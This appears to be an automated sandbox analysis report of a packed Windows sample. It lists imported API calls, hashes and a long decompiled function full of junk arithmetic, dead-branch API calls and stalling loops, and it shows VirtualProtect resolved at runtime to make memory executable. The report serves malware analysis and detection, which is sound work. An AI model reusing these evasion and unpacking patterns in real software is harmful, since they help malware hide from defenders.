                  0x0044d3ff
                  0x0044d411

                  APIs
                  • GetCompressedFileSizeA.KERNEL32(00000000,?), ref: 0044CFFD
                  • OpenWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 0044D006
                  • GetConsoleAliasW.KERNEL32(?,00000000,00000000,00000000), ref: 0044D016
                  • SetFileTime.KERNEL32(00000000,00000000,00000000,00000000), ref: 0044D020
                  • GlobalFindAtomW.KERNEL32(00000000), ref: 0044D027
                  • DisconnectNamedPipe.KERNEL32(?), ref: 0044D03A
                  • FindAtomW.KERNEL32(00000000), ref: 0044D041
                  • GlobalUnlock.KERNEL32(00000000), ref: 0044D048
                  • GetModuleHandleExW.KERNEL32(00000000,00000000,?), ref: 0044D060
                  • GetCurrentProcess.KERNEL32 ref: 0044D06F
                  • FileTimeToSystemTime.KERNEL32(?,00000000), ref: 0044D07D
                  • _wscanf.LIBCMT ref: 0044D089
                  • SetTimeZoneInformation.KERNEL32(00000000), ref: 0044D0AE
                  • SetTapeParameters.KERNEL32 ref: 0044D0B7
                  • GlobalWire.KERNEL32 ref: 0044D0BE
                  • TzSpecificLocalTimeToSystemTime.KERNEL32(?,?,?), ref: 0044D11D
                  • SetWaitableTimer.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044D129
                  • _calloc.LIBCMT ref: 0044D131
                  • _calloc.LIBCMT ref: 0044D138
                  • _wscanf.LIBCMT ref: 0044D160
                  • _memset.LIBCMT ref: 0044D17F
                  • __vswprintf_c_l.LIBCMT ref: 0044D19D
                  • _calloc.LIBCMT ref: 0044D1A7
                  • _feof.LIBCMT ref: 0044D1B6
                  • LocalAlloc.KERNELBASE(00000000,?), ref: 0044D215
                  • lstrcatW.KERNEL32(0046F998,kernel32.dll), ref: 0044D276
                  • GetModuleHandleW.KERNEL32(0046F998), ref: 0044D281
                  • GetProcAddress.KERNEL32(00000000,VirtualProtect), ref: 0044D28D
                  • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0044D2AE
                  • SetSystemTimeAdjustment.KERNEL32 ref: 0044D2CA
                  • GetFileAttributesW.KERNEL32(00000000), ref: 0044D2E9
                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 0044D2FD
                  • SizeofResource.KERNEL32(00000000,00000000), ref: 0044D316
                  • InterlockedIncrement.KERNEL32(?), ref: 0044D349
                  • SetFileAttributesA.KERNEL32(00000000,00000000), ref: 0044D387
                  • WriteConsoleOutputCharacterW.KERNEL32(00000000,00000000,00000000,00000020,?), ref: 0044D3AC
                  • OpenWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 0044D3B4
                  • GetAtomNameA.KERNEL32(00000000,00000000,00000000), ref: 0044D3D7
                  • SetConsoleScreenBufferSize.KERNEL32(00000000,?), ref: 0044D3EE
                  Strings
                  Memory Dump Source
                  • Source File: 00000002.00000002.332584154.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000002.00000002.332564319.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000002.00000002.332671161.000000000044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000002.00000002.332692191.000000000047B000.00000002.00020000.sdmp Download File
                  • Associated: 00000002.00000002.332735526.0000000000488000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID: Time$File$AtomConsoleGlobalSystemTimerWaitable_calloc$AttributesFindHandleLocalModuleOpenProcessSize_wscanf$AddressAdjustmentAliasAllocBufferCharacterCompressedCurrentDisconnectIncrementInformationInterlockedNameNamedOutputParametersPipeProcProtectResourceScreenSizeofSpecificTapeTerminateUnlockVirtualWireWriteZone__vswprintf_c_l_feof_memsetlstrcat
                  • String ID: $0$0 %s %d %f$0.txt$VirtualProtect$kernel32.dll$zitomuridapelagajepegolik pegehegovamasetotid %s %d %f
                  • API String ID: 444771405-3930434341
                  • Opcode ID: 2af6f543481ca3a72293e0ae1f08cbf2416f4aaa0c0440ae29fcf88c4df6a543
                  • Instruction ID: a9b66736483b1857c80ec09cc6ba03e05ca75465405631252d00ec08e1b80064
                  • Opcode Fuzzy Hash: 2af6f543481ca3a72293e0ae1f08cbf2416f4aaa0c0440ae29fcf88c4df6a543
                  • Instruction Fuzzy Hash: A6B1B171901224ABE7209B61EC49B9F77B8FF49300F00807AE54DA2251EB785A85CFED
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 92%
                  			E0044D420(signed int __edx) {
                  				signed int _v8;
                  				short _v2056;
                  				intOrPtr _v2084;
                  				intOrPtr _v2124;
                  				intOrPtr _v2128;
                  				intOrPtr _v2132;
                  				intOrPtr _v2136;
                  				intOrPtr _v2140;
                  				intOrPtr _v2144;
                  				intOrPtr _v2148;
                  				intOrPtr _v2152;
                  				intOrPtr _v2156;
                  				intOrPtr _v2160;
                  				intOrPtr _v2164;
                  				intOrPtr _v2168;
                  				intOrPtr _v2172;
                  				intOrPtr _v2176;
                  				intOrPtr _v2180;
                  				intOrPtr _v2184;
                  				intOrPtr _v2188;
                  				intOrPtr _v2192;
                  				intOrPtr _v2196;
                  				intOrPtr _v2200;
                  				intOrPtr _v2204;
                  				intOrPtr _v2208;
                  				intOrPtr _v2212;
                  				intOrPtr _v2216;
                  				intOrPtr _v2220;
                  				intOrPtr _v2224;
                  				intOrPtr _v2228;
                  				signed int _v2232;
                  				intOrPtr _v2236;
                  				intOrPtr _v2240;
                  				intOrPtr _v2244;
                  				intOrPtr _v2248;
                  				intOrPtr _v2252;
                  				intOrPtr _v2256;
                  				intOrPtr _v2260;
                  				intOrPtr _v2264;
                  				intOrPtr _v2268;
                  				intOrPtr _v2272;
                  				intOrPtr _v2276;
                  				intOrPtr _v2280;
                  				intOrPtr _v2284;
                  				intOrPtr _v2288;
                  				intOrPtr _v2292;
                  				intOrPtr _v2296;
                  				intOrPtr _v2300;
                  				intOrPtr _v2304;
                  				intOrPtr _v2308;
                  				intOrPtr _v2312;
                  				intOrPtr _v2316;
                  				intOrPtr _v2320;
                  				intOrPtr _v2324;
                  				intOrPtr _v2328;
                  				intOrPtr _v2332;
                  				intOrPtr _v2336;
                  				intOrPtr _v2340;
                  				intOrPtr _v2344;
                  				intOrPtr _v2348;
                  				intOrPtr _v2352;
                  				intOrPtr _v2356;
                  				intOrPtr _v2360;
                  				intOrPtr _v2364;
                  				intOrPtr _v2368;
                  				intOrPtr _v2372;
                  				intOrPtr _v2376;
                  				intOrPtr _v2380;
                  				intOrPtr _v2384;
                  				intOrPtr _v2388;
                  				intOrPtr _v2392;
                  				intOrPtr _v2396;
                  				intOrPtr _v2400;
                  				intOrPtr _v2404;
                  				intOrPtr _v2408;
                  				intOrPtr _v2412;
                  				intOrPtr _v2416;
                  				intOrPtr _v2420;
                  				intOrPtr _v2424;
                  				intOrPtr _v2428;
                  				intOrPtr _v2432;
                  				intOrPtr _v2436;
                  				intOrPtr _v2440;
                  				intOrPtr _v2444;
                  				intOrPtr _v2448;
                  				intOrPtr _v2452;
                  				intOrPtr _v2456;
                  				intOrPtr _v2460;
                  				intOrPtr _v2464;
                  				intOrPtr _v2468;
                  				intOrPtr _v2472;
                  				intOrPtr _v2476;
                  				intOrPtr _v2480;
                  				intOrPtr _v2484;
                  				intOrPtr _v2488;
                  				intOrPtr _v2492;
                  				intOrPtr _v2496;
                  				intOrPtr _v2500;
                  				intOrPtr _v2504;
                  				intOrPtr _v2508;
                  				intOrPtr _v2512;
                  				intOrPtr _v2516;
                  				intOrPtr _v2520;
                  				intOrPtr _v2524;
                  				intOrPtr _v2528;
                  				intOrPtr _v2532;
                  				intOrPtr _v2536;
                  				intOrPtr _v2540;
                  				intOrPtr _v2544;
                  				intOrPtr _v2548;
                  				intOrPtr _v2552;
                  				intOrPtr _v2556;
                  				intOrPtr _v2560;
                  				intOrPtr _v2564;
                  				intOrPtr _v2568;
                  				intOrPtr _v2572;
                  				intOrPtr _v2576;
                  				intOrPtr _v2580;
                  				intOrPtr _v2584;
                  				intOrPtr _v2588;
                  				intOrPtr _v2592;
                  				intOrPtr _v2596;
                  				intOrPtr _v2600;
                  				intOrPtr _v2604;
                  				intOrPtr _v2608;
                  				intOrPtr _v2612;
                  				intOrPtr _v2616;
                  				intOrPtr _v2620;
                  				intOrPtr _v2624;
                  				intOrPtr _v2628;
                  				intOrPtr _v2632;
                  				intOrPtr _v2636;
                  				intOrPtr _v2640;
                  				intOrPtr _v2644;
                  				intOrPtr _v2648;
                  				intOrPtr _v2652;
                  				intOrPtr _v2656;
                  				intOrPtr _v2660;
                  				intOrPtr _v2664;
                  				intOrPtr _v2668;
                  				intOrPtr _v2672;
                  				intOrPtr _v2676;
                  				intOrPtr _v2680;
                  				intOrPtr _v2684;
                  				intOrPtr _v2688;
                  				intOrPtr _v2692;
                  				intOrPtr _v2696;
                  				intOrPtr _v2700;
                  				intOrPtr _v2704;
                  				intOrPtr _v2708;
                  				intOrPtr _v2712;
                  				intOrPtr _v2716;
                  				intOrPtr _v2720;
                  				intOrPtr _v2724;
                  				intOrPtr _v2728;
                  				intOrPtr _v2732;
                  				intOrPtr _v2736;
                  				intOrPtr _v2740;
                  				intOrPtr _v2744;
                  				intOrPtr _v2748;
                  				intOrPtr _v2752;
                  				intOrPtr _v2756;
                  				intOrPtr _v2760;
                  				intOrPtr _v2764;
                  				intOrPtr _v2768;
                  				intOrPtr _v2772;
                  				intOrPtr _v2776;
                  				intOrPtr _v2780;
                  				intOrPtr _v2784;
                  				intOrPtr _v2788;
                  				intOrPtr _v2792;
                  				intOrPtr _v2796;
                  				intOrPtr _v2800;
                  				intOrPtr _v2804;
                  				intOrPtr _v2808;
                  				intOrPtr _v2812;
                  				intOrPtr _v2816;
                  				intOrPtr _v2820;
                  				long _v2824;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				signed int _t1353;
                  				intOrPtr _t1355;
                  				intOrPtr _t1359;
                  				void* _t1679;
                  				intOrPtr _t1680;
                  				void* _t1681;
                  				signed int _t1685;
                  				void* _t1794;
                  				void* _t1796;
                  				void* _t1797;
                  				void* _t1798;
                  				void* _t1799;
                  				signed int _t1800;
                  
                  				_t1685 = __edx;
                  				_t1353 =  *0x44f0d4; // 0x45b66027
                  				_v8 = _t1353 ^ _t1800;
                  				_t1355 =  *0x45071c; // 0x25e44
                  				_t1796 = 0;
                  				 *0x477a9c = _t1355;
                  				_t2 = _t1796 + 0x15; // 0x15
                  				_t1679 = _t2;
                  				do {
                  					if(_t1796 == 0x846bcc) {
                  						 *0x477a9c =  *0x477a9c + _t1679;
                  					}
                  					if( *0x477a9c == _t1679) {
                  						lstrcpyW( &_v2056, 0);
                  					}
                  					_t1796 = _t1796 + 1;
                  				} while (_t1796 < 0x8d7445);
                  				_t1680 = _v2084;
                  				_t1797 = 0;
                  				L7:
                  				L7:
                  				if( *0x477a9c == 0x79) {
                  					SetConsoleTextAttribute(0, 0);
                  				}
                  				GetLastError();
                  				if(_t1797 <= 0x88d774d || _t1680 == 0xd82db7 || _v2824 == 0x19c5e9) {
                  					goto L12;
                  				}
                  				if( *0x477a9c == 0xa) {
                  					GetCompressedFileSizeA(0,  &_v2824);
                  				}
                  				_v2724 = 0x44a9da4e;
                  				_v2584 = 0x6ad8a95e;
                  				_v2576 = 0x7b69be47;
                  				_v2536 = 0x14c2e6d4;
                  				_v2384 = 0x28a559e1;
                  				_v2720 = 0x12b4d9c9;
                  				_v2528 = 0x4acc8c38;
                  				_v2500 = 0x6603dd32;
                  				_v2520 = 0x79e55d99;
                  				_v2512 = 0x75aa05c8;
                  				_v2800 = 0x3b86b06b;
                  				_v2320 = 0x6bfa16e7;
                  				_v2504 = 0x6c149d6f;
                  				_v2496 = 0x4497f21d;
                  				_v2208 = 0x68c7aaf4;
                  				_v2312 = 0x1b99e464;
                  				_v2172 = 0x6992a715;
                  				_v2580 = 0x29ee4e17;
                  				_v2676 = 0x41a8760a;
                  				_v2124 = 0x7b4be8f2;
                  				_v2556 = 0x35cadfcd;
                  				_v2200 = 0x8d45732;
                  				_v2468 = 0x49e672e5;
                  				_v2660 = 0x3d4798c7;
                  				_v2228 = 0x403ea7b;
                  				_v2524 = 0x39360869;
                  				_v2148 = 0x2f509a8b;
                  				_v2664 = 0x12c28787;
                  				_v2792 = 0x6025b974;
                  				_v2388 = 0x22099ed0;
                  				_v2488 = 0x19805e21;
                  				_v2304 = 0x7a7aebfb;
                  				_v2284 = 0x6854fe88;
                  				_v2712 = 0x3f69951e;
                  				_v2604 = 0x5405a68a;
                  				_v2220 = 0xa0352ff;
                  				_v2644 = 0x3197b985;
                  				_v2784 = 0x3adddeeb;
                  				_v2656 = 0x7a178419;
                  				_v2332 = 0x5f0bc694;
                  				_v2296 = 0x69c9eac3;
                  				_v2380 = 0x20615706;
                  				_v2460 = 0x17113a0c;
                  				_v2756 = 0x1b41d345;
                  				_v2648 = 0x2c6d7833;
                  				_v2640 = 0x6033997;
                  				_v2288 = 0x73d4a529;
                  				_v2748 = 0x60a15865;
                  				_v2480 = 0x11b1db9;
                  				_v2276 = 0x33372644;
                  				_v2212 = 0x4dceb6a6;
                  				_v2700 = 0x1a4127c0;
                  				_v2548 = 0xb7d57a2;
                  				_v2516 = 0x5ac66e59;
                  				_v2732 = 0x303de2db;
                  				_v2376 = 0x7f507239;
                  				_v2796 = 0x6d7f46c9;
                  				_v2268 = 0x530e4771;
                  				_v2372 = 0x5882bc6f;
                  				_v2472 = 0xcf5ad75;
                  				_v2204 = 0x32cbebe0;
                  				_v2464 = 0x7b2565eb;
                  				_v2192 = 0x3f83f420;
                  				_v2596 = 0x247fe944;
                  				_v2452 = 0x6261adfb;
                  				_v2632 = 0x72589c69;
                  				_v2324 = 0x4eb6e22e;
                  				_v2420 = 0x42e29ca8;
                  				_v2184 = 0x63e004a6;
                  				_v2572 = 0x33432d90;
                  				_v2176 = 0x53109ab7;
                  				_v2568 = 0x7d079485;
                  				_v2484 = 0x6530bc67;
                  				_v2368 = 0x5ec1adf7;
                  				_v2168 = 0x9050015;
                  				_v2456 = 0x6796a66b;
                  				_v2160 = 0x28a7f20a;
                  				_v2140 = 0x4d5847b2;
                  				_v2624 = 0x65bee181;
                  				_v2280 = 0x7e00e5eb;
                  				_v2316 = 0x78648b1a;
                  				_v2152 = 0x40997771;
                  				_v2620 = 0x70375f04;
                  				_v2776 = 0x2790da23;
                  				_v2144 = 0x4d904b3c;
                  				_v2684 = 0x6f0950df;
                  				_v2272 = 0x51a37f3c;
                  				_v2260 = 0x7f307c19;
                  				_v2412 = 0x26cf591a;
                  				_v2164 = 0x15a10528;
                  				_v2768 = 0x7530c1be;
                  				_v2704 = 0x17b03026;
                  				_v2760 = 0x79d7d807;
                  				_v2636 = 0x6d4e5636;
                  				_v2808 = 0x4befadde;
                  				_v2696 = 0x1f11855b;
                  				_v2444 = 0x20b9f4fc;
                  				_v2448 = 0x71b924ac;
                  				_v2652 = 0x5cc926ef;
                  				_v2264 = 0x38ee55a6;
                  				_v2540 = 0x63e11d00;
                  				_v2132 = 0x33b6f37b;
                  				_v2364 = 0x5670554e;
                  				_v2492 = 0x2e292ea;
                  				_v2360 = 0x391cf360;
                  				_v2688 = 0x55d4166f;
                  				_v2816 = 0x39d6995f;
                  				_v2668 = 0x20e4fcd4;
                  				_v2308 = 0x6a5bcb7f;
                  				_v2252 = 0x572192d3;
                  				_v2560 = 0x5140ea03;
                  				_v2680 = 0x260bcee2;
                  				_v2136 = 0x1405a16a;
                  				_v2552 = 0x6491c21c;
                  				_v2752 = 0x4ddb6bd0;
                  				_v2196 = 0x12025003;
                  				_v2128 = 0x7ac3b62f;
                  				_v2744 = 0x2dcd7c2c;
                  				_v2508 = 0x46a3c27b;
                  				_v2188 = 0x2b99274f;
                  				_v2708 = 0x2b882dcf;
                  				_v2256 = 0x382e1570;
                  				_v2616 = 0x2e0cd52d;
                  				_v2608 = 0x52311eb5;
                  				_v2672 = 0x742b4d0;
                  				_v2440 = 0x5acde78f;
                  				_v2356 = 0x2959f1a5;
                  				_v2820 = 0x4986ffcb;
                  				_v2588 = 0x2101bbef;
                  				_v2352 = 0x791dba98;
                  				_v2804 = 0xae4251a;
                  				_v2788 = 0x1682bddb;
                  				_v2544 = 0x211da799;
                  				_v2248 = 0x7d24570a;
                  				_v2564 = 0x5f90315;
                  				_v2812 = 0x611a1e02;
                  				_v2772 = 0x660dedc5;
                  				_v2240 = 0x4ef7ed87;
                  				_v2432 = 0x4916d379;
                  				_v2300 = 0x3af4dd0b;
                  				_v2404 = 0x3326689a;
                  				_v2244 = 0x245c8ae0;
                  				_v2348 = 0x805bc45;
                  				_v2436 = 0x7a27ff5b;
                  				_v2232 = 0x5b73a71c;
                  				_v2156 = 0x5c1105f7;
                  				_v2476 = 0x483dad6f;
                  				_v2736 = 0x32e98e8b;
                  				_v2224 = 0x6e41cb36;
                  				_v2344 = 0x515d7181;
                  				_v2424 = 0xf3f054d;
                  				_v2180 = 0x2227b5c2;
                  				_v2628 = 0x3b6490b3;
                  				_v2780 = 0x2d389c8f;
                  				_v2692 = 0x1177e53c;
                  				_v2612 = 0x1227fd54;
                  				_v2600 = 0x5fe51d1f;
                  				_v2396 = 0x3e2345bb;
                  				_v2740 = 0x6b92efa9;
                  				_v2716 = 0x1bc06e92;
                  				_v2764 = 0x76d51563;
                  				_v2532 = 0x30addbf6;
                  				_v2236 = 0xf4780f8;
                  				_v2336 = 0x255e4e8b;
                  				_v2416 = 0x3853c9d3;
                  				_v2592 = 0x4be88660;
                  				_v2728 = 0x7348f580;
                  				_v2340 = 0x66dd7ea;
                  				_v2428 = 0x53db962b;
                  				_v2408 = 0x54f201fd;
                  				_v2400 = 0x58490f6c;
                  				_v2328 = 0x7ddfdd1b;
                  				_v2292 = 0x1e65c579;
                  				_v2392 = 0x4d4614d0;
                  				_v2216 = 0x71dee15f;
                  				_v2576 = _v2576 + 0x6d8b7ada;
                  				_v2724 = _v2724 + 0x1d6b4c59;
                  				_v2724 = _v2724 + 0xa931eb7;
                  				_v2536 = _v2536 - 0x355020c2;
                  				_v2576 = _v2576 + 0x3e9198a;
                  				_v2576 = _v2576 - 0x183145bb;
                  				_v2536 = _v2536 + 0x33054614;
                  				_v2576 = _v2576 + 0x685ce330;
                  				_v2584 = _v2584 - 0x68f9130d;
                  				_v2584 = _v2584 - 0x3604161c;
                  				_v2496 = _v2496 + 0x1f54b3b0;
                  				_v2500 = _v2500 - 0x226f1844;
                  				_v2504 = _v2504 - 0x4d7002a2;
                  				_v2520 = _v2520 + 0x292dacde;
                  				_v2496 = _v2496 - 0x8f8b38a;
                  				_v2208 = _v2208 - 0x6180a0d1;
                  				_v2584 = _v2584 - 0x59d3956a;
                  				_v2520 = _v2520 - 0x1ed2bdec;
                  				_v2528 = _v2528 - 0x99b9cfa;
                  				_v2584 = _v2584 + 0x765a6097;
                  				_v2312 = _v2312 + 0x469b217a;
                  				_v2520 = _v2520 + 0x5a2c6b8f;
                  				_v2720 = _v2720 - 0x2c3d041c;
                  				_v2660 = _v2660 + 0x369fcce4;
                  				_v2576 = _v2576 - 0x31d80;
                  				_v2208 = _v2208 + 0x3512fcc;
                  				_v2384 = _v2384 + 0x72f67a6a;
                  				_v2556 = _v2556 - 0x34047e0f;
                  				_v2320 = _v2320 - 0x530d2940;
                  				_v2720 = _v2720 - 0x54223e5b;
                  				_v2664 = _v2664 + 0x733692e3;
                  				_v2488 = _v2488 + 0x45bc5b29;
                  				_v2676 = _v2676 - 0x7d690eb7;
                  				_v2488 = _v2488 + 0x6180704b;
                  				_v2228 = _v2228 - 0x7201ef8d;
                  				_v2556 = _v2556 - 0x495eecb1;
                  				_v2712 = _v2712 - 0x3e0b79e2;
                  				_v2200 = _v2200 + 0x4d780c4f;
                  				_v2304 = _v2304 - 0x17ca7999;
                  				_v2656 = _v2656 + 0x7565c3f0;
                  				_v2720 = _v2720 + 0x52909547;
                  				_v2496 = _v2496 + 0x4688c4a;
                  				_v2792 = _v2792 + 0x2285ce17;
                  				_v2468 = _v2468 + 0x5f949a90;
                  				_v2200 = _v2200 + 0x6eca51d2;
                  				_v2576 = _v2576 + 0x37ebfb41;
                  				_v2724 = _v2724 + 0x5e91be73;
                  				_v2512 = _v2512 - 0x29911abe;
                  				_v2384 = _v2384 - 0x66735542;
                  				_v2524 = _v2524 - 0x37c89b9b;
                  				_v2320 = _v2320 + 0x58ded285;
                  				_v2312 = _v2312 - 0x6414a9a2;
                  				_v2388 = _v2388 + 0x435cf0a2;
                  				_v2512 = _v2512 + 0x248b9f09;
                  				_v2792 = _v2792 + 0x289ad687;
                  				_v2500 = _v2500 - 0x73086c1;
                  				_v2220 = _v2220 - 0x7a39acaf;
                  				_v2496 = _v2496 + 0x539503f8;
                  				_v2640 = _v2640 + 0x2da6999;
                  				_v2320 = _v2320 - 0x7e1000c6;
                  				_v2640 = _v2640 + 0x33fe1e7b;
                  				_v2172 = _v2172 - 0x6507edcd;
                  				_v2284 = _v2284 - 0x9e561d1;
                  				_v2200 = _v2200 + 0x5fb09101;
                  				_v2488 = _v2488 - 0x5dd9f0a6;
                  				_v2748 = _v2748 - 0x60e62e6f;
                  				_v2584 = _v2584 + 0x6ec42303;
                  				_v2504 = _v2504 - 0x13c2465c;
                  				_v2660 = _v2660 - 0x57cd9ec2;
                  				_v2648 = _v2648 + 0x57a9e58e;
                  				_v2200 = _v2200 + 0x71241964;
                  				_v2220 = _v2220 + 0x13901622;
                  				_v2388 = _v2388 + 0x792c4a87;
                  				_v2724 = _v2724 + 0xff13dfd;
                  				_v2304 = _v2304 + 0x79a768cd;
                  				_v2200 = _v2200 - 0x7b4c3364;
                  				_v2576 = _v2576 + 0x49e173ec;
                  				_v2644 = _v2644 - 0x17b1f649;
                  				_v2376 = _v2376 - 0x4c2be117;
                  				_v2548 = _v2548 + 0x59dc0daf;
                  				_v2720 = _v2720 + 0x5171059a;
                  				_v2604 = _v2604 + 0x73773932;
                  				_v2584 = _v2584 - 0x439327b;
                  				_v2676 = _v2676 - 0x31f97d9;
                  				_v2200 = _v2200 + 0x728dd399;
                  				_v2536 = _v2536 + 0x46d1ad3e;
                  				_v2228 = _v2228 - 0x4240bcd5;
                  				_v2284 = _v2284 + 0x27615e4f;
                  				_v2452 = _v2452 + 0xcba62c;
                  				_v2516 = _v2516 - 0x5de5377e;
                  				_v2676 = _v2676 + 0x2776cb3f;
                  				_v2124 = _v2124 - 0x47019df0;
                  				_v2572 = _v2572 - 0x62f02761;
                  				_v2640 = _v2640 - 0x1587f77d;
                  				_v2140 = _v2140 - 0x3d893a5f;
                  				_v2220 = _v2220 - 0x51b2be13;
                  				_v2468 = _v2468 - 0x44b01426;
                  				_v2684 = _v2684 + 0x56c955e7;
                  				_v2276 = _v2276 + 0x58c7ad14;
                  				_v2748 = _v2748 - 0x1e7d6276;
                  				_v2572 = _v2572 - 0x41a9370e;
                  				_v2632 = _v2632 - 0x31d72383;
                  				_v2712 = _v2712 + 0x555e37ec;
                  				_v2720 = _v2720 - 0x5e6fd03b;
                  				_v2632 = _v2632 + 0x43b56802;
                  				_v2516 = _v2516 - 0x22f85aaf;
                  				_v2276 = _v2276 - 0x27d12145;
                  				_v2152 = _v2152 + 0x7077cc7f;
                  				_v2368 = _v2368 + 0xc364cce;
                  				_v2596 = _v2596 + 0x2b86c6d5;
                  				_v2268 = _v2268 - 0x16936f15;
                  				_v2484 = _v2484 - 0x1b65c63b;
                  				_v2808 = _v2808 - 0x20c07e0f;
                  				_v2696 = _v2696 - 0x76fc3fb7;
                  				_v2420 = _v2420 + 0x7aac4dfb;
                  				_v2768 = _v2768 - 0x7877429b;
                  				_v2704 = _v2704 + 0x5e773902;
                  				_v2644 = _v2644 + 0x7a2e5f14;
                  				_v2696 = _v2696 - 0x6215bd5d;
                  				_v2444 = _v2444 - 0x3a830ec6;
                  				_v2700 = _v2700 - 0x6591a298;
                  				_v2276 = _v2276 + 0x6abb4bc;
                  				_v2720 = _v2720 - 0xf9d548d;
                  				_v2160 = _v2160 + 0x23fda6cc;
                  				_v2796 = _v2796 - 0x1ba6f3b3;
                  				_v2632 = _v2632 - 0x17978b1b;
                  				_v2268 = _v2268 - 0x2f09b65f;
                  				_v2200 = _v2200 + 0x13fdab06;
                  				_v2784 = _v2784 + 0x1fd2bb19;
                  				_v2380 = _v2380 - 0x31ffb4ff;
                  				_v2164 = _v2164 + 0x4e96e3ff;
                  				_v2148 = _v2148 - 0x2fa44266;
                  				_v2228 = _v2228 + 0x735fad96;
                  				_v2384 = _v2384 - 0x14e59165;
                  				_v2784 = _v2784 - 0x11a21833;
                  				_v2548 = _v2548 + 0x2c1a7ff3;
                  				_v2164 = _v2164 - 0x59804bb4;
                  				_v2288 = _v2288 + 0x60ccce30;
                  				_v2168 = _v2168 + 0x4fd5ba6e;
                  				_v2320 = _v2320 + 0x7b18c1a4;
                  				_v2280 = _v2280 + 0x2fa4baef;
                  				_v2748 = _v2748 + 0x271e7212;
                  				_v2556 = _v2556 + 0x4e6b712c;
                  				_v2696 = _v2696 - 0x4c66360d;
                  				_v2200 = _v2200 + 0x2f40c9fa;
                  				_v2464 = _v2464 + 0x7b8436c0;
                  				_v2644 = _v2644 - 0x68bc71f0;
                  				_v2652 = _v2652 + 0xd906f8;
                  				_v2128 = _v2128 + 0xb934f5a;
                  				_v2712 = _v2712 + 0x6cb34440;
                  				_v2320 = _v2320 + 0x2c8ab82;
                  				_v2712 = _v2712 + 0x3f0c75cc;
                  				_v2708 = _v2708 - 0xda00ffb;
                  				_v2596 = _v2596 - 0x6292b22a;
                  				_v2272 = _v2272 - 0x58565805;
                  				_v2412 = _v2412 - 0x3d6e9681;
                  				_v2308 = _v2308 + 0x24af9f00;
                  				_v2648 = _v2648 + 0x6c0e26de;
                  				_v2604 = _v2604 - 0x693ad540;
                  				_v2796 = _v2796 + 0x1b2708a2;
                  				_v2684 = _v2684 - 0x5dc85716;
                  				_v2556 = _v2556 + 0x5aff458d;
                  				_v2664 = _v2664 + 0x3f08c142;
                  				_v2596 = _v2596 - 0x43dcecc1;
                  				_v2384 = _v2384 + 0x42e67f49;
                  				_v2248 = _v2248 + 0x55d064e6;
                  				_v2620 = _v2620 - 0xc82ada;
                  				_v2540 = _v2540 - 0xf59058a;
                  				_v2460 = _v2460 + 0x24847caf;
                  				_v2788 = _v2788 - 0x3bc20a1f;
                  				_v2368 = _v2368 + 0x70c03845;
                  				_v2444 = _v2444 - 0x5b032ad0;
                  				_v2684 = _v2684 + 0x6c81fb8f;
                  				_v2488 = _v2488 + 0x6a3958f1;
                  				_v2256 = _v2256 + 0x5c3fadcc;
                  				_v2484 = _v2484 - 0x585c3b16;
                  				_v2608 = _v2608 - 0x1efb8a97;
                  				_v2452 = _v2452 + 0x4fc97394;
                  				_v2796 = _v2796 + 0x26a6d9b2;
                  				_v2712 = _v2712 + 0x17b62951;
                  				_v2572 = _v2572 - 0x4165cff6;
                  				_v2296 = _v2296 + 0x3876f7e5;
                  				_v2512 = _v2512 - 0x68a286bd;
                  				_v2276 = _v2276 + 0x29dd4d9;
                  				_v2552 = _v2552 + 0x8340024;
                  				_v2528 = _v2528 + 0x87079ea;
                  				_v2388 = _v2388 + 0x2b6e6f26;
                  				_v2500 = _v2500 + 0x4a97aeb4;
                  				_v2412 = _v2412 - 0x3ece0928;
                  				_v2656 = _v2656 - 0x67f86a90;
                  				_v2664 = _v2664 + 0x4893c58e;
                  				_v2300 = _v2300 - 0x602058e5;
                  				_v2664 = _v2664 + 0x6a83363d;
                  				_v2368 = _v2368 - 0x3ebd01d9;
                  				_v2280 = _v2280 - 0x320ec06e;
                  				_v2660 = _v2660 + 0xdf2082e;
                  				_v2668 = _v2668 + 0x630e3716;
                  				_v2556 = _v2556 - 0x362efeee;
                  				_v2652 = _v2652 + 0x6d650a54;
                  				_v2804 = _v2804 - 0x613b0909;
                  				_v2204 = _v2204 + 0x6d837948;
                  				_v2148 = _v2148 - 0x260d1700;
                  				_v2140 = _v2140 + 0x7014d920;
                  				_v2600 = _v2600 - 0x43cd2aa5;
                  				_v2224 = _v2224 - 0x36438d84;
                  				_v2752 = _v2752 + 0x3329a607;
                  				_v2388 = _v2388 - 0x7518a889;
                  				_v2616 = _v2616 - 0x53a78e90;
                  				_v2756 = _v2756 + 0x2515017c;
                  				_v2792 = _v2792 + 0x61c34f21;
                  				_v2252 = _v2252 - 0x5250992d;
                  				_v2740 = _v2740 + 0x4d7efe4;
                  				_v2124 = _v2124 - 0x679df150;
                  				_v2588 = _v2588 + 0x3aa3b5ba;
                  				_v2308 = _v2308 - 0x5d56436a;
                  				_v2432 = _v2432 + 0x74a28a6e;
                  				_v2696 = _v2696 - 0x72f3cc10;
                  				_t1685 = 0x1b898378 * _v2232 >> 0x20;
                  				_v2448 = _v2448 + 0x24e6cd3;
                  				_v2252 = _v2252 + 0x37f5dfcf;
                  				_v2512 = _v2512 - 0x7a22c58f;
                  				_v2464 = _v2464 - 0x269b6cb8;
                  				L17:
                  				_t1798 = 0;
                  				do {
                  					if(_t1798 == 0x562d05) {
                  						_t1359 =  *0x4500f8; // 0x4263eb
                  						 *0x477aa0 = _t1359;
                  					}
                  					if( *0x477a9c == 0x3c) {
                  						FindResourceW(0, 0, 0);
                  					}
                  					_t1798 = _t1798 + 1;
                  				} while (_t1798 < 0x5f6c78);
                  				E0044CFD0(); // executed
                  				_pop(_t1794);
                  				_pop(_t1799);
                  				_pop(_t1681);
                  				if( *0x477a9c == 0xc) {
                  					FindResourceExW(0, 0, 0, 0);
                  					 *0x46f388 = 0xd25463be;
                  					 *0x46f38c = 0xffffffff;
                  				}
                  				return E004020C8(0, _t1681, _v8 ^ _t1800, _t1685, _t1794, _t1799);
                  				L12:
                  				_t1797 = _t1797 + 1;
